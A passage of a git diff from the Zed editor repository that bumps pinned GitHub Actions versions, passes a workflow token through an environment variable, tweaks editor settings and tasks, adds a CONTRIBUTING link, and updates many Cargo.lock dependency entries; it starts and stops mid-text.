a/.github/workflows/track_duplicate_bot_effectiveness.yml +++ b/.github/workflows/track_duplicate_bot_effectiveness.yml @@ -22,14 +22,14 @@ jobs: timeout-minutes: 5 steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: sparse-checkout: script/github-track-duplicate-bot-effectiveness.py sparse-checkout-cone-mode: false - name: Get github app token id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v1.11.7 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -61,14 +61,14 @@ jobs: timeout-minutes: 10 steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + uses: 
actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: sparse-checkout: script/github-track-duplicate-bot-effectiveness.py sparse-checkout-cone-mode: false - name: Get github app token id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v1.11.7 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} diff --git a/.github/workflows/update_duplicate_magnets.yml b/.github/workflows/update_duplicate_magnets.yml index 1c6c5a562532891eb97ceb11f44b81f35612c026..d14f4aa92451aab9c36df49d3be128fd4797a4da 100644 --- a/.github/workflows/update_duplicate_magnets.yml +++ b/.github/workflows/update_duplicate_magnets.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'zed-industries/zed' steps: - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Set up Python uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 @@ -21,7 +21,9 @@ jobs: run: pip install requests - name: Update duplicate magnets issue + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | python script/github-find-top-duplicated-bugs.py \ - --github-token ${{ secrets.GITHUB_TOKEN }} \ + --github-token "$GITHUB_TOKEN" \ --issue-number 46355 diff --git a/.zed/settings.json b/.zed/settings.json index e9bbe9aa4ffd142ad1733d4c18a4e54230a8b541..2ecbd5623d26bd32d40443f8553bf4062248ec45 100644 --- a/.zed/settings.json +++ b/.zed/settings.json @@ -58,8 +58,7 @@ "ensure_final_newline_on_save": true, "file_scan_exclusions": [ "crates/agent/src/edit_agent/evals/fixtures", - "crates/eval/worktrees/", - "crates/eval/repos/", + "crates/agent/src/tools/evals/fixtures", "**/.git", "**/.svn", "**/.hg", diff --git a/.zed/tasks.json b/.zed/tasks.json index 
b6a9d9f4cd794d205d028f12bd8300e70f988f55..be2ccefedca46406713d9abf116c5efa9390fdb8 100644 --- a/.zed/tasks.json +++ b/.zed/tasks.json @@ -4,13 +4,13 @@ "command": "./script/clippy", "args": [], "allow_concurrent_runs": true, - "use_new_terminal": false + "use_new_terminal": false, }, { "label": "cargo run --profile release-fast", "command": "cargo", "args": ["run", "--profile", "release-fast"], "allow_concurrent_runs": true, - "use_new_terminal": false - } + "use_new_terminal": false, + }, ] diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 740b33dd55790bd3cabfc75146d71854eca6375d..e7e7629825b5f487a3b00af525d36458eb91956c 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -26,6 +26,8 @@ If you're looking for concrete ideas: - [Triaged bugs with confirmed steps to reproduce](https://github.com/zed-industries/zed/issues?q=is%3Aissue%20state%3Aopen%20type%3ABug%20label%3Astate%3Areproducible). - [Area labels](https://github.com/zed-industries/zed/labels?q=area%3A*) to browse bugs in a specific part of the product you care about (after clicking on an area label, add type:Bug to the search). +If you're thinking about proposing or building a larger feature, read the [Zed Feature Process](./docs/src/development/feature-process.md) for how we think about feature design — what context to provide, what integration points to consider, and how to put together a strong proposal. 
+ ## Sending changes The Zed culture values working code and synchronous conversations over long diff --git a/Cargo.lock b/Cargo.lock index 258d1fb4c500cb97e34bf925c8444ef37f667f51..97412711a55667a4976a35313eb6c0388acc74ef 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -15,7 +15,7 @@ dependencies = [ "collections", "env_logger 0.11.8", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "gpui", "image", "indoc", @@ -36,7 +36,6 @@ dependencies = [ "smol", "task", "telemetry", - "tempfile", "terminal", "text", "ui", @@ -45,7 +44,6 @@ dependencies = [ "util", "uuid", "watch", - "zlog", ] [[package]] @@ -61,7 +59,7 @@ dependencies = [ "serde", "serde_json", "settings", - "theme", + "theme_settings", "ui", "util", "workspace", @@ -76,9 +74,9 @@ dependencies = [ "clock", "collections", "ctor", - "futures 0.3.31", + "fs", + "futures 0.3.32", "gpui", - "indoc", "language", "log", "pretty_assertions", @@ -102,34 +100,24 @@ dependencies = [ "editor", "extension_host", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "language", "project", "proto", - "release_channel", "smallvec", "ui", "util", "workspace", ] -[[package]] -name = "addr2line" -version = "0.24.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dfbe277e56a376000877090da837660b4427aad530e3028d44e0bffe4f89a1c1" -dependencies = [ - "gimli 0.31.1", -] - [[package]] name = "addr2line" version = "0.25.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1b5d307320b3181d6d7954e663bd7c774a838b8220fe0593c86d9fb09f498b4b" dependencies = [ - "gimli 0.32.3", + "gimli", ] [[package]] @@ -169,13 +157,13 @@ dependencies = [ "context_server", "ctor", "db", - "derive_more 0.99.20", + "derive_more", "editor", "env_logger 0.11.8", "eval_utils", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "gpui_tokio", @@ -213,11 +201,9 @@ dependencies = [ "task", "telemetry", "tempfile", - "terminal", "text", "theme", "thiserror 2.0.17", - 
"tree-sitter-rust", "ui", "unindent", "url", @@ -225,7 +211,6 @@ dependencies = [ "uuid", "watch", "web_search", - "worktree", "zed_env_vars", "zlog", "zstd", @@ -233,16 +218,16 @@ dependencies = [ [[package]] name = "agent-client-protocol" -version = "0.9.4" +version = "0.10.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2659b1089101b15db31137710159421cb44785ecdb5ba784be3b4a6f8cb8a475" +checksum = "9c56a59cf6315e99f874d2c1f96c69d2da5ffe0087d211297fc4a41f849770a2" dependencies = [ "agent-client-protocol-schema", "anyhow", "async-broadcast", "async-trait", - "derive_more 2.0.1", - "futures 0.3.31", + "derive_more", + "futures 0.3.32", "log", "serde", "serde_json", @@ -250,16 +235,16 @@ dependencies = [ [[package]] name = "agent-client-protocol-schema" -version = "0.10.8" +version = "0.11.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "44bc1fef9c32f03bce2ab44af35b6f483bfd169bf55cc59beeb2e3b1a00ae4d1" +checksum = "e0497b9a95a404e35799904835c57c6f8c69b9d08ccfd3cb5b7d746425cd6789" dependencies = [ "anyhow", - "derive_more 2.0.1", + "derive_more", "schemars", "serde", "serde_json", - "strum 0.27.2", + "strum 0.28.0", ] [[package]] @@ -275,16 +260,15 @@ dependencies = [ "chrono", "client", "collections", - "credentials_provider", "env_logger 0.11.8", + "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "google_ai", "gpui", "gpui_tokio", "http_client", "indoc", - "language", "language_model", "libc", "log", @@ -304,6 +288,7 @@ dependencies = [ "util", "uuid", "watch", + "zed_credentials_provider", ] [[package]] @@ -341,19 +326,12 @@ dependencies = [ "agent_settings", "ai_onboarding", "anyhow", - "arrayvec", - "assistant_slash_command", - "assistant_slash_commands", - "assistant_text_thread", - "async-fs", "audio", "base64 0.22.1", "buffer_diff", "chrono", "client", - "clock", "cloud_api_types", - "cloud_llm_client", "collections", "command_palette_hooks", "component", @@ -366,10 +344,12 @@ 
dependencies = [ "feature_flags", "file_icons", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", + "git", "gpui", "gpui_tokio", + "heapless", "html_to_markdown", "http_client", "image", @@ -396,14 +376,11 @@ dependencies = [ "prompt_store", "proto", "rand 0.9.2", - "recent_projects", "release_channel", - "remote_connection", "reqwest_client", "rope", "rules_library", "schemars", - "search", "semver", "serde", "serde_json", @@ -413,14 +390,13 @@ dependencies = [ "streaming_diff", "task", "telemetry", - "tempfile", "terminal", "terminal_view", "text", "theme", + "theme_settings", "time", "time_format", - "title_bar", "tree-sitter-md", "ui", "ui_input", @@ -524,21 +500,6 @@ dependencies = [ "equator", ] -[[package]] -name = "alloc-no-stdlib" -version = "2.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc7bb162ec39d46ab1ca8c77bf72e890535becd1751bb45f64c597edb4c8c6b3" - -[[package]] -name = "alloc-stdlib" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "94fb8275041c72129eb51b7d0322c29b8387a0386127718b096429201a5d6ece" -dependencies = [ - "alloc-no-stdlib", -] - [[package]] name = "allocator-api2" version = "0.2.21" @@ -601,6 +562,17 @@ version = "0.1.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" +[[package]] +name = "annotate-snippets" +version = "0.12.12" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c86cd1c51b95d71dde52bca69ed225008f6ff4c8cc825b08042aa1ef823e1980" +dependencies = [ + "anstyle", + "memchr", + "unicode-width", +] + [[package]] name = "anstream" version = "0.6.21" @@ -657,18 +629,13 @@ version = "0.1.0" dependencies = [ "anyhow", "chrono", - "futures 0.3.31", - "gpui", - "gpui_tokio", + "futures 0.3.32", "http_client", - "reqwest_client", "schemars", "serde", "serde_json", - "settings", "strum 0.27.2", "thiserror 2.0.17", - "tokio", 
] [[package]] @@ -692,6 +659,15 @@ dependencies = [ "num-traits", ] +[[package]] +name = "ar_archive_writer" +version = "0.5.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7eb93bbb63b9c227414f6eb3a0adfddca591a8ce1e9b60661bb08969b87e340b" +dependencies = [ + "object", +] + [[package]] name = "arbitrary" version = "1.4.2" @@ -701,6 +677,15 @@ dependencies = [ "derive_arbitrary", ] +[[package]] +name = "arc-swap" +version = "1.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a07d1f37ff60921c83bdfc7407723bdefe89b44b98a9b772f225c8f9d67141a6" +dependencies = [ + "rustversion", +] + [[package]] name = "arg_enum_proc_macro" version = "0.3.4" @@ -709,7 +694,7 @@ checksum = "0ae92a5119aa49cdbcf6b9f893fe4e1d98b04ccbf82ee0584ad948a44a734dea" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -729,9 +714,6 @@ name = "arrayvec" version = "0.7.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50" -dependencies = [ - "serde", -] [[package]] name = "as-raw-xcb-connection" @@ -777,7 +759,7 @@ name = "askpass" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "gpui", "log", "net", @@ -797,110 +779,6 @@ dependencies = [ "rust-embed", ] -[[package]] -name = "assistant_slash_command" -version = "0.1.0" -dependencies = [ - "anyhow", - "async-trait", - "collections", - "derive_more 0.99.20", - "extension", - "futures 0.3.31", - "gpui", - "language", - "language_model", - "parking_lot", - "pretty_assertions", - "serde", - "serde_json", - "ui", - "util", - "workspace", -] - -[[package]] -name = "assistant_slash_commands" -version = "0.1.0" -dependencies = [ - "anyhow", - "assistant_slash_command", - "chrono", - "collections", - "editor", - "feature_flags", - "fs", - "futures 0.3.31", - "fuzzy", - "gpui", - "html_to_markdown", - "http_client", - "language", 
- "multi_buffer", - "pretty_assertions", - "project", - "prompt_store", - "rope", - "serde", - "serde_json", - "settings", - "smol", - "text", - "ui", - "util", - "workspace", - "worktree", - "zlog", -] - -[[package]] -name = "assistant_text_thread" -version = "0.1.0" -dependencies = [ - "agent_settings", - "anyhow", - "assistant_slash_command", - "assistant_slash_commands", - "chrono", - "client", - "clock", - "cloud_llm_client", - "collections", - "context_server", - "fs", - "futures 0.3.31", - "fuzzy", - "gpui", - "indoc", - "itertools 0.14.0", - "language", - "language_model", - "log", - "open_ai", - "parking_lot", - "paths", - "pretty_assertions", - "project", - "prompt_store", - "proto", - "rand 0.9.2", - "regex", - "rpc", - "serde", - "serde_json", - "settings", - "smallvec", - "smol", - "telemetry", - "text", - "ui", - "unindent", - "util", - "uuid", - "workspace", - "zed_env_vars", -] - [[package]] name = "async-attributes" version = "1.1.2" @@ -1076,7 +954,7 @@ name = "async-pipe" version = "0.1.3" source = "git+https://github.com/zed-industries/async-pipe-rs?rev=82d00a04211cf4e1236029aa03e6b6ce2a74c553#82d00a04211cf4e1236029aa03e6b6ce2a74c553" dependencies = [ - "futures 0.3.31", + "futures 0.3.32", "log", ] @@ -1106,7 +984,7 @@ checksum = "3b43422f69d8ff38f95f1b2bb76517c91589a924d1559a0e935d7c8ce0274c11" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -1174,7 +1052,7 @@ checksum = "c7c24de15d275a1ecfd47a380fb4d5ec9bfe0933f309ed5e705b775596a3574d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -1204,7 +1082,7 @@ checksum = "9035ad2d096bed7955a320ee7e2230574d28fd3c3a0f186cbea1ff3c7eed5dbb" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -1278,7 +1156,6 @@ name = "audio" version = "0.1.0" dependencies = [ "anyhow", - "async-tar", "collections", "cpal", "crossbeam", @@ -1290,7 +1167,6 @@ dependencies = [ "rodio", "serde", 
"settings", - "smol", "thiserror 2.0.17", "util", ] @@ -1316,7 +1192,7 @@ dependencies = [ "clock", "ctor", "db", - "futures 0.3.31", + "futures 0.3.32", "futures-lite 1.13.0", "gpui", "http_client", @@ -1342,6 +1218,7 @@ version = "0.1.0" dependencies = [ "anyhow", "log", + "scopeguard", "simplelog", "tempfile", "windows 0.61.3", @@ -1944,11 +1821,11 @@ version = "0.3.76" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "bb531853791a215d7c62a30daf0dde835f381ab5de4589cfe7c649d2cbe92bd6" dependencies = [ - "addr2line 0.25.1", + "addr2line", "cfg-if", "libc", "miniz_oxide", - "object 0.37.3", + "object", "rustc-demangle", "windows-link 0.2.1", ] @@ -1994,7 +1871,7 @@ dependencies = [ "anyhow", "aws-sdk-bedrockruntime", "aws-smithy-types", - "futures 0.3.31", + "futures 0.3.32", "schemars", "serde", "serde_json", @@ -2042,7 +1919,7 @@ dependencies = [ "regex", "rustc-hash 2.1.1", "shlex", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2060,7 +1937,7 @@ dependencies = [ "regex", "rustc-hash 2.1.1", "shlex", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2069,7 +1946,16 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3" dependencies = [ - "bit-vec", + "bit-vec 0.8.0", +] + +[[package]] +name = "bit-set" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "34ddef2995421ab6a5c779542c81ee77c115206f4ad9d5a8e05f4ff49716a3dd" +dependencies = [ + "bit-vec 0.9.1", ] [[package]] @@ -2078,6 +1964,12 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" +[[package]] +name = "bit-vec" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b71798fca2c1fe1086445a7258a4bc81e6e49dcd24c8d0dd9a1e57395b603f51" + [[package]] name = "bit_field" 
version = "0.10.3" @@ -2163,6 +2055,16 @@ dependencies = [ "piper", ] +[[package]] +name = "bmrng" +version = "0.5.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d54df9073108f1558f90ae6c5bf5ab9c917c4185f5527b280c87a993cbead0ac" +dependencies = [ + "futures-core", + "tokio", +] + [[package]] name = "bon" version = "3.8.2" @@ -2179,13 +2081,13 @@ version = "3.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "89ec27229c38ed0eb3c0feee3d2c1d6a4379ae44f418a29a658890e062d8f365" dependencies = [ - "darling", + "darling 0.21.3", "ident_case", "prettyplease", "proc-macro2", "quote", "rustversion", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2214,7 +2116,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2226,27 +2128,6 @@ dependencies = [ "workspace", ] -[[package]] -name = "brotli" -version = "8.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4bd8b9603c7aa97359dbd97ecf258968c95f3adddd6db2f7e7a5bef101c84560" -dependencies = [ - "alloc-no-stdlib", - "alloc-stdlib", - "brotli-decompressor", -] - -[[package]] -name = "brotli-decompressor" -version = "5.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "874bb8112abecc98cbd6d81ea4fa7e94fb9449648c93cc89aa40c81c24d7de03" -dependencies = [ - "alloc-no-stdlib", - "alloc-stdlib", -] - [[package]] name = "brush-parser" version = "0.3.0" @@ -2279,7 +2160,7 @@ version = "0.1.0" dependencies = [ "clock", "ctor", - "futures 0.3.31", + "futures 0.3.32", "git2", "gpui", "language", @@ -2287,7 +2168,6 @@ dependencies = [ "pretty_assertions", "rand 0.9.2", "rope", - "serde_json", "settings", "sum_tree", "text", @@ -2364,7 +2244,7 @@ checksum = "f9abbd1bc6865053c427f7198e6af43bfdedc55ab791faed4fbd361d789575ff" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2415,6 +2295,15 @@ dependencies = [ 
"libc", ] +[[package]] +name = "bzip2" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f3a53fac24f34a81bc9954b5d6cfce0c21e18ec6959f44f56e8e90e4bb7c346c" +dependencies = [ + "libbz2-rs-sys", +] + [[package]] name = "bzip2-sys" version = "0.1.13+1.0.8" @@ -2446,10 +2335,10 @@ version = "0.25.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9225bdcf4e4a9a4c08bf16607908eb2fbf746828d5e0b5e019726dbf6571f201" dependencies = [ - "darling", + "darling 0.20.11", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2468,10 +2357,9 @@ dependencies = [ "collections", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", - "http_client", "language", "livekit_client", "log", @@ -2651,6 +2539,16 @@ dependencies = [ "serde", ] +[[package]] +name = "cargo-platform" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "87a0c0e6148f11f01f32650a2ea02d532b2ad4e81d8bd41e6e565b5adc5e6082" +dependencies = [ + "serde", + "serde_core", +] + [[package]] name = "cargo_metadata" version = "0.19.2" @@ -2658,7 +2556,21 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dd5eb614ed4c27c5d706420e4320fbe3216ab31fa1c33cd8246ac36dae4479ba" dependencies = [ "camino", - "cargo-platform", + "cargo-platform 0.1.9", + "semver", + "serde", + "serde_json", + "thiserror 2.0.17", +] + +[[package]] +name = "cargo_metadata" +version = "0.23.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ef987d17b0a113becdd19d3d0022d04d7ef41f9efe4f3fb63ac44ba61df3ade9" +dependencies = [ + "camino", + "cargo-platform 0.3.2", "semver", "serde", "serde_json", @@ -2703,7 +2615,7 @@ dependencies = [ "quote", "serde", "serde_json", - "syn 2.0.106", + "syn 2.0.117", "tempfile", "toml 0.8.23", ] @@ -2745,6 +2657,16 @@ dependencies = [ "target-lexicon 0.12.16", ] +[[package]] +name = "cfg-expr" 
+version = "0.20.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "78cef5b5a1a6827c7322ae2a636368a573006b27cfa76c7ebd53e834daeaab6a" +dependencies = [ + "smallvec", + "target-lexicon 0.13.3", +] + [[package]] name = "cfg-if" version = "1.0.4" @@ -2780,7 +2702,7 @@ dependencies = [ "client", "clock", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "language", @@ -2922,7 +2844,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2967,18 +2889,21 @@ dependencies = [ "chrono", "clock", "cloud_api_client", + "cloud_api_types", "cloud_llm_client", "collections", "credentials_provider", - "derive_more 0.99.20", + "db", + "derive_more", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", "http_client", "http_client_tls", "httparse", + "language_model", "log", "objc2-foundation", "parking_lot", @@ -3010,6 +2935,7 @@ dependencies = [ "util", "windows 0.61.3", "worktree", + "zed_credentials_provider", ] [[package]] @@ -3027,7 +2953,7 @@ version = "0.1.0" dependencies = [ "anyhow", "cloud_api_types", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", "http_client", @@ -3056,8 +2982,6 @@ name = "cloud_llm_client" version = "0.1.0" dependencies = [ "anyhow", - "indoc", - "pretty_assertions", "serde", "serde_json", "strum 0.27.2", @@ -3143,17 +3067,6 @@ dependencies = [ "objc", ] -[[package]] -name = "codespan-reporting" -version = "0.12.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fe6d2e5af09e8c8ad56c969f2157a3d4238cebc7c55f0a517728c38f7b200f81" -dependencies = [ - "serde", - "termcolor", - "unicode-width", -] - [[package]] name = "codespan-reporting" version = "0.13.0" @@ -3172,7 +3085,7 @@ dependencies = [ "anyhow", "edit_prediction", "edit_prediction_types", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "icons", @@ -3182,6 +3095,8 @@ dependencies = [ "serde", 
"serde_json", "text", + "zed_credentials_provider", + "zeta_prompt", ] [[package]] @@ -3189,15 +3104,9 @@ name = "collab" version = "0.44.0" dependencies = [ "agent", - "agent-client-protocol", - "agent_settings", - "agent_ui", "anyhow", - "assistant_slash_command", - "assistant_text_thread", "async-trait", "async-tungstenite", - "audio", "aws-config", "aws-sdk-kinesis", "aws-sdk-s3", @@ -3213,10 +3122,8 @@ dependencies = [ "collab_ui", "collections", "command_palette_hooks", - "context_server", "ctor", "dap", - "dap-types", "dap_adapters", "dashmap", "debugger_ui", @@ -3225,7 +3132,7 @@ dependencies = [ "extension", "file_finder", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "git_hosting_providers", "git_ui", @@ -3233,7 +3140,6 @@ dependencies = [ "gpui_tokio", "hex", "http_client", - "hyper 0.14.32", "indoc", "language", "language_model", @@ -3274,8 +3180,8 @@ dependencies = [ "telemetry_events", "text", "theme", + "theme_settings", "time", - "title_bar", "tokio", "toml 0.8.23", "tower 0.4.13", @@ -3303,15 +3209,14 @@ dependencies = [ "collections", "db", "editor", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", - "http_client", + "livekit_client", "log", "menu", "notifications", "picker", - "pretty_assertions", "project", "release_channel", "rpc", @@ -3321,13 +3226,14 @@ dependencies = [ "smallvec", "telemetry", "theme", + "theme_settings", "time", "time_format", "title_bar", - "tree-sitter-md", "ui", "util", "workspace", + "zed_actions", ] [[package]] @@ -3378,10 +3284,8 @@ dependencies = [ "client", "collections", "command_palette_hooks", - "ctor", "db", "editor", - "env_logger 0.11.8", "fuzzy", "go_to_line", "gpui", @@ -3392,10 +3296,10 @@ dependencies = [ "postage", "project", "serde", - "serde_json", "settings", "telemetry", "theme", + "theme_settings", "time", "ui", "util", @@ -3408,11 +3312,30 @@ name = "command_palette_hooks" version = "0.1.0" dependencies = [ "collections", - "derive_more 0.99.20", + "derive_more", "gpui", "workspace", 
] +[[package]] +name = "compliance" +version = "0.1.0" +dependencies = [ + "anyhow", + "async-trait", + "derive_more", + "futures 0.3.32", + "indoc", + "itertools 0.14.0", + "jsonwebtoken", + "octocrab", + "regex", + "semver", + "serde", + "serde_json", + "tokio", +] + [[package]] name = "component" version = "0.1.0" @@ -3448,6 +3371,7 @@ dependencies = [ "session", "settings", "theme", + "theme_settings", "ui", "ui_input", "uuid", @@ -3460,6 +3384,7 @@ version = "0.4.31" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ef8a506ec4b81c460798f572caead636d57d3d7e940f998160f52bd254bf2d23" dependencies = [ + "bzip2 0.6.1", "compression-core", "deflate64", "flate2", @@ -3562,37 +3487,53 @@ version = "0.1.0" dependencies = [ "anyhow", "async-trait", + "base64 0.22.1", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "log", "net", "parking_lot", "postage", + "rand 0.9.2", "schemars", "serde", "serde_json", "settings", + "sha2", "slotmap", "smol", "tempfile", "terminal", + "tiny_http", "url", "util", ] [[package]] name = "convert_case" -version = "0.4.0" +version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6245d59a3e82a7fc217c5828a6692dbc6dfb63a0c8c90495621f7b9d79704a0e" +checksum = "baaaa0ecca5b51987b9423ccdc971514dd8b0bb7b4060b983d3664dad3f1f89f" +dependencies = [ + "unicode-segmentation", +] [[package]] name = "convert_case" -version = "0.8.0" +version = "0.10.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "baaaa0ecca5b51987b9423ccdc971514dd8b0bb7b4060b983d3664dad3f1f89f" +checksum = "633458d4ef8c78b72454de2d54fd6ab2e60f9e02be22f3c6104cdc8a4e0fceb9" +dependencies = [ + "unicode-segmentation", +] + +[[package]] +name = "convert_case" +version = "0.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "affbf0190ed2caf063e3def54ff444b449371d55c58e513a95ab98eca50adb49" dependencies = [ "unicode-segmentation", ] @@ 
-3603,18 +3544,14 @@ version = "0.1.0" dependencies = [ "anyhow", "async-std", - "client", - "clock", "collections", "command_palette_hooks", "copilot_chat", - "ctor", "edit_prediction_types", "editor", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", - "http_client", "icons", "indoc", "language", @@ -3632,6 +3569,7 @@ dependencies = [ "settings", "sum_tree", "theme", + "theme_settings", "util", "workspace", "zlog", @@ -3641,11 +3579,12 @@ dependencies = [ name = "copilot_chat" version = "0.1.0" dependencies = [ + "anthropic", "anyhow", "collections", "dirs 4.0.0", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "log", @@ -3926,36 +3865,36 @@ dependencies = [ [[package]] name = "cranelift-assembler-x64" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5023e06632d8f351c2891793ccccfe4aef957954904392434038745fb6f1f68" +checksum = "ba33ddc4e157cb1abe9da6c821e8824f99e56d057c2c22536850e0141f281d61" dependencies = [ "cranelift-assembler-x64-meta", ] [[package]] name = "cranelift-assembler-x64-meta" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c4012b4c8c1f6eb05c0a0a540e3e1ee992631af51aa2bbb3e712903ce4fd65" +checksum = "69b23dd6ea360e6fb28a3f3b40b7f126509668f58076a4729b2cfd656f26a0ad" dependencies = [ "cranelift-srcgen", ] [[package]] name = "cranelift-bforest" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4d6d883b4942ef3a7104096b8bc6f2d1a41393f159ac8de12aed27b25d67f895" +checksum = "a9d81afcee8fe27ee2536987df3fadcb2e161af4edb7dbe3ef36838d0ce74382" dependencies = [ "cranelift-entity", ] [[package]] name = "cranelift-bitset" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "db7b2ee9eec6ca8a716d900d5264d678fb2c290c58c46c8da7f94ee268175d17" +checksum = 
